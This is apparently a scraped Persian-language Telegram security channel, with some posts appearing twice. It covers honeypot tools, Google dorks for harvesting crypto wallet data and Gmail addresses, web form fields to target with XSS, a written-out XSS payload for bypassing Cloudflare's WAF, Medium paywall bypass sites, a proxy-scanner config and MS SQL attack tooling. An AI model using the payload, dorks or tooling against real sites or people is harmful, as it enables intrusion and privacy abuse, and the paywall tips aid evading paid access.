👩💻 هانی پات: مجموعه ای از هانی پات های وب
در این پست، هانی تاپهای چند پروتکلی را لیست میکنم که از پروتکلهایی مانند HTTP، HTTPS، FTP، SSH و غیره پشتیبانی میکنند.
- برخی دارای تجزیه و تحلیل داخلی برای ردیابی و تجزیه و تحلیل فعالیت ها در هانی پات هستند، اما از نظر پیچیدگی با سیستم های فریب که چند روز قبل بررسی شدند مقایسه نمی شوند.
1. Dionaea
یک هانی پات چند پروتکلی است که همه چیز را از FTP تا SIP (حملات VoIP) پوشش می دهد. Dionaea دارای معماری ماژولار است و از Python برای شبیه سازی پروتکل استفاده می کند. میتواند اجرای یک بار بدافزار را با استفاده از LibEmu شبیهسازی کند.
2. HoneyHTTPD
- ابزاری برای ایجاد هانی پات های وب بر اساس پایتون. این امکان را به شما می دهد تا به راحتی وب سرورها و سرویس های وب جعلی را راه اندازی کنید، در سطح پروتکل HTTP با داده های لازم پاسخ دهید و درخواست های ارسال شده به سرور را ثبت کنید.
3. DDoSPot
یک Honeypot مبتنی بر UDP برای ردیابی و نظارت بر حملات DDoS توزیع شده است . سرورهای DNS، NTP، SSDP، CHARGEN، تصادفی UDP را شبیه سازی می کند.
4. medusa
یک هانی پات چند پروتکلی سریع و امن است که می تواند ssh، telnet، http، https یا هر tcp دیگر و همچنین سرورهای udp را تقلید کند.
5. Masscanned
طعمه ای با تعامل کم است که خزنده ها و ربات های شبکه را هدف قرار می دهد. با استفاده از پروتکل های مختلف به درخواست های آنها پاسخ می دهد. با IVRE ادغام می شود و به شما امکان می دهد لیست سیاه IP را جمع آوری کنید، مشابه کاری که GreyNoise انجام می دهد.
#Honeypot #ThreatHunting
@TryHackBox
@TryHackBoxOfficial
در این پست، هانی تاپهای چند پروتکلی را لیست میکنم که از پروتکلهایی مانند HTTP، HTTPS، FTP، SSH و غیره پشتیبانی میکنند.
- برخی دارای تجزیه و تحلیل داخلی برای ردیابی و تجزیه و تحلیل فعالیت ها در هانی پات هستند، اما از نظر پیچیدگی با سیستم های فریب که چند روز قبل بررسی شدند مقایسه نمی شوند.
1. Dionaea
یک هانی پات چند پروتکلی است که همه چیز را از FTP تا SIP (حملات VoIP) پوشش می دهد. Dionaea دارای معماری ماژولار است و از Python برای شبیه سازی پروتکل استفاده می کند. میتواند اجرای یک بار بدافزار را با استفاده از LibEmu شبیهسازی کند.
2. HoneyHTTPD
- ابزاری برای ایجاد هانی پات های وب بر اساس پایتون. این امکان را به شما می دهد تا به راحتی وب سرورها و سرویس های وب جعلی را راه اندازی کنید، در سطح پروتکل HTTP با داده های لازم پاسخ دهید و درخواست های ارسال شده به سرور را ثبت کنید.
3. DDoSPot
یک Honeypot مبتنی بر UDP برای ردیابی و نظارت بر حملات DDoS توزیع شده است . سرورهای DNS، NTP، SSDP، CHARGEN، تصادفی UDP را شبیه سازی می کند.
4. medusa
یک هانی پات چند پروتکلی سریع و امن است که می تواند ssh، telnet، http، https یا هر tcp دیگر و همچنین سرورهای udp را تقلید کند.
5. Masscanned
طعمه ای با تعامل کم است که خزنده ها و ربات های شبکه را هدف قرار می دهد. با استفاده از پروتکل های مختلف به درخواست های آنها پاسخ می دهد. با IVRE ادغام می شود و به شما امکان می دهد لیست سیاه IP را جمع آوری کنید، مشابه کاری که GreyNoise انجام می دهد.
#Honeypot #ThreatHunting
@TryHackBox
@TryHackBoxOfficial
www.greynoise.io
GreyNoise Intelligence | Real-Time Intelligence For Modern Threats
Empower your security team to work on the most urgent and critical threats without being overwhelmed by noisy, low-priority alerts. Learn more about GreyNoise>>
🔥3
#WalletsIdentification Google Dorks...
wallet -block
wallet | wallet -block
site:bitcointalk.org wallet
site:https://docs.google.com/spreadsheets Bounty intext:"@gmail.com"
❗️ استفاده كردن جستجوی پیشرفته اپراتورها ساده ترین راه برای جمع آوری اطلاعات است در مورد آدرس کیف پول کریپتو
@TryHackBox
wallet -block
wallet | wallet -block
site:bitcointalk.org wallet
site:https://docs.google.com/spreadsheets Bounty intext:"@gmail.com"
❗️ استفاده كردن جستجوی پیشرفته اپراتورها ساده ترین راه برای جمع آوری اطلاعات است در مورد آدرس کیف پول کریپتو
@TryHackBox
Google Workspace
Google Sheets: Online Spreadsheets & Templates | Google Workspace
Create online spreadsheets with Google Sheets. Collaborate in real-time from any device and leverage AI to generate formatting, analysis, and more.
نمونههایی از مؤلفههای برنامه وب که میتوانید محتویات XSS payload خود را پیادهسازی کنید:
☑️ Login forms
☑️ Contact forms
☑️ Feedback forms
☑️ User profile
☑️ Request information
☑️ Feedback form
☑️ Request headers (and intentional error generation)
)
#tips #bugbounty
@TryHackBox
☑️ Login forms
☑️ Contact forms
☑️ Feedback forms
☑️ User profile
☑️ Request information
☑️ Feedback form
☑️ Request headers (and intentional error generation)
)
#tips #bugbounty
@TryHackBox
bypass XSS Cloudflare WAF
Encoded Payload
Clean Payload
#CF #bypass
@TryHackBox
Encoded Payload
"><track/onerror='confirm\%601\%60'>Clean Payload
"><track/onerror='confirm1'>#CF #bypass
@TryHackBox
💢 شماره پورتهای TCP/UDP و عملکرد و کاربرد هریک
🔸از اون دسته پستهایی که باید ذخیره کنید؛ یه جایی به کارتون میاد
#TCP
#UDP
@TryHackBox
🔸از اون دسته پستهایی که باید ذخیره کنید؛ یه جایی به کارتون میاد
#TCP
#UDP
@TryHackBox
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
🖼 Bypass Medium Paywall
اگر شما هم مثل من با مقالات پولی از Medium برخورد کنید، کمی لایف هک کنید. این سایت ها به شما امکان می دهند مقالات پولی Medium را به صورت رایگان بخوانید:
🔗 https://freedium.cfd/<URL>
🔗 https://medium-forall.vercel.app/
#medium
@TryHackBox
اگر شما هم مثل من با مقالات پولی از Medium برخورد کنید، کمی لایف هک کنید. این سایت ها به شما امکان می دهند مقالات پولی Medium را به صورت رایگان بخوانید:
🔗 https://freedium.cfd/<URL>
🔗 https://medium-forall.vercel.app/
#medium
@TryHackBox
نکات و ترفندهای پاورشل - قسمت اول
https://www.instagram.com/p/C2-R6NIOv_J/?igsh=MzRlODBiNWFlZA==
#powershell
@TryHackBox
https://www.instagram.com/p/C2-R6NIOv_J/?igsh=MzRlODBiNWFlZA==
#powershell
@TryHackBox
Zmap-ProxyScanner
راهی سریع و امن برای یافتن سرورهای پروکسی. 2000-5000 پروکسی http, socks4, socks5 کارآمد را در یک اسکن پیدا کنید.
Config
https://github.com/Yariya/Zmap-ProxyScanner
#zamp
@TryHackBox
@TryHackBoxOfficial
@LibrarySecOfficial
راهی سریع و امن برای یافتن سرورهای پروکسی. 2000-5000 پروکسی http, socks4, socks5 کارآمد را در یک اسکن پیدا کنید.
Config
{
"check-site": "https://google.com",
"proxy-type": "http",
"http_threads": 2000,
"headers": {
"user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.115 Safari/537.36",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8"
},
"print_ips": {
"enabled": true,
"display-ip-info": true
},
"timeout": {
"http_timeout": 5,
"socks4_timeout": 5,
"socks5_timeout": 5
}
}https://github.com/Yariya/Zmap-ProxyScanner
#zamp
@TryHackBox
@TryHackBoxOfficial
@LibrarySecOfficial
👍3
🗄Microsoft SQL DBMS
اغلب میتوان در طول پنتست زیرساختهای داخلی ویندوز یافت، بنابراین مهم است که یک زنجیره ابزار با کیفیت بالا در دسترس داشته باشید. دو ابزار را بگیرید که به شما امکان می دهد حملات زیر را انجام دهید.
1. Enumeration Techniques
2. Authentication Providers
3. Using Standard Modules
4. Using Linked Modules
5. Using Impersonation Modules
6. Using SCCM Modules
7. Contributing and Extending SQLRecon
8. Hardening your SQL Server Environment
SQLRecon
PySQLRecon
#tools #pentest #redteam
@TryHackBox
اغلب میتوان در طول پنتست زیرساختهای داخلی ویندوز یافت، بنابراین مهم است که یک زنجیره ابزار با کیفیت بالا در دسترس داشته باشید. دو ابزار را بگیرید که به شما امکان می دهد حملات زیر را انجام دهید.
1. Enumeration Techniques
2. Authentication Providers
3. Using Standard Modules
4. Using Linked Modules
5. Using Impersonation Modules
6. Using SCCM Modules
7. Contributing and Extending SQLRecon
8. Hardening your SQL Server Environment
SQLRecon
PySQLRecon
#tools #pentest #redteam
@TryHackBox
🔥2